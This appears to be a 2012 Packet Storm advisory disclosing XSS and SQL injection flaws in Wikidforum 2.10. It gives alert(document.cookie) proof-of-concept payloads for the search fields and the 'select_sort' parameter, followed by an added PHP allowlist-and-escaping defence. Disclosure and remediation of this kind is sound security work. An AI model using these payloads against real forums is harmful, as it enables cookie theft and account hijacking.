Wikidforum 2.10 Cross Site Scripting / SQL Injection

2012-03-12T00:00:00
ID PACKETSTORM:110697
Type packetstorm
Reporter Stefan Schurtz
Modified 2012-03-12T00:00:00

Description

                                        
                                            `Advisory: Wikidforum 2.10 Multiple security vulnerabilities  
Advisory ID: SSCHADV2012-005  
Author: Stefan Schurtz  
Affected Software: Successfully tested on Wikidforum 2.10  
Vendor URL: http://www.wikidforum.com/  
Vendor Status: informed  
  
==========================  
Vulnerability Description  
==========================  
  
Wikidforum 2.10 is prone to multiple XSS and SQL injection vulnerabilities.  
  
==================  
PoC-Exploit  
==================  
  
// xss  
Search-Field -> '"</script><script>alert(document.cookie)</script>  
Search-Field -> Advanced Search -> Author -> '"</script><script>alert(document.cookie)</script>  
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> ><iMg src=N onerror=alert(document.cookie)>  
  
// possible SQL-Injection  
  
Search-Field -> Advanced Search -> POST-Parameter 'select_sort' -> [sql-injection]  
Search-Field -> Advanced Search -> POST-Parameter 'opt_search_select' -> [sql-injection]  
  
=========  
Solution  
=========  
  
-  
  
====================  
Disclosure Timeline  
====================  
  
19-Feb-2012 - vendor informed  
10-Mar-2012 - no response from vendor  
  
========  
Credits  
========  
  
Vulnerabilities found and advisory written by Stefan Schurtz.  
  
===========  
References  
===========  
  
http://www.darksecurity.de/advisories/2012/SSCHADV2012-005.txt  
`
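
The advisory's Solution section is empty. As an added example (not Wikidforum's code and not from the advisory author), this is one way to handle the 'select_sort' and search-field inputs named in the PoC section: map the sort value through an allowlist, bind the search term as a parameter, and HTML-encode on output. The 'posts' table, its columns, the sort keys and the helper names are assumptions, since the page does not show the application's schema or queries.

```php
<?php
// Added example, not Wikidforum code. Table, columns and sort keys are
// hypothetical; the advisory does not show the application's schema.

// Allowlist: client-supplied select_sort value => fixed ORDER BY fragment.
const SORT_MAP = [
    'date_desc' => 'created DESC',
    'date_asc'  => 'created ASC',
    'author'    => 'author ASC',
];

function h(string $s): string
{
    // Encode for an HTML text node or a quoted attribute value.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function search_posts(PDO $db, string $term, string $sortKey): array
{
    // Unknown keys fall back to the default; the raw value never reaches SQL.
    $orderBy = SORT_MAP[$sortKey] ?? SORT_MAP['date_desc'];
    // ORDER BY cannot be a bound parameter, so only the mapped constant is
    // concatenated. The search term itself is bound.
    $stmt = $db->prepare(
        "SELECT author, title FROM posts WHERE title LIKE :t ORDER BY $orderBy"
    );
    $stmt->execute([':t' => '%' . $term . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed sample data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (author TEXT, title TEXT, created INTEGER)');
$db->exec("INSERT INTO posts VALUES ('alice', 'Install notes', 2)");
$db->exec("INSERT INTO posts VALUES ('bob', 'Upgrade notes', 1)");

// Constructed request: the sort value is the advisory's select_sort string.
$term = 'notes';
$sort = '><iMg src=N onerror=alert(document.cookie)>';

echo '<p>Results for "' . h($term) . '"</p>' . "\n";
foreach (search_posts($db, $term, $sort) as $row) {
    echo '<li>' . h($row['title']) . ' by ' . h($row['author']) . "</li>\n";
}
// When the form redisplays the chosen sort, emit the validated key only.
$shown = array_key_exists($sort, SORT_MAP) ? $sort : 'date_desc';
echo '<input type="hidden" name="select_sort" value="' . h($shown) . '">' . "\n";
```

With the constructed request, the query runs with the default ordering and the hidden field carries 'date_desc'; the submitted markup is never written to the page or the SQL string.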